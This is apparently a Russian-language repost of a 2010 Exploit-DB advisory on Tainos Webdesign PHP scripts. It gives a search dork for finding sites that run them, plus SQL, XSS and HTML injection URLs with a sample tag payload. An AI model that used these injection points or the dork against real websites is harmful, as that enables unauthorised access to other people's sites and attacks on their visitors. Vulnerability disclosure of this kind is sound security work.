- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12631
- Проверка EDB
-
- Пройдено
- Автор
- COBRA_21
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-05-17
Код:
-------------------------------------------------------------------------------------------
Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: [email protected]
Script Home: http://www.tainos-webdesign.com
Dork: intext:"© Tainos Webdesign"
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
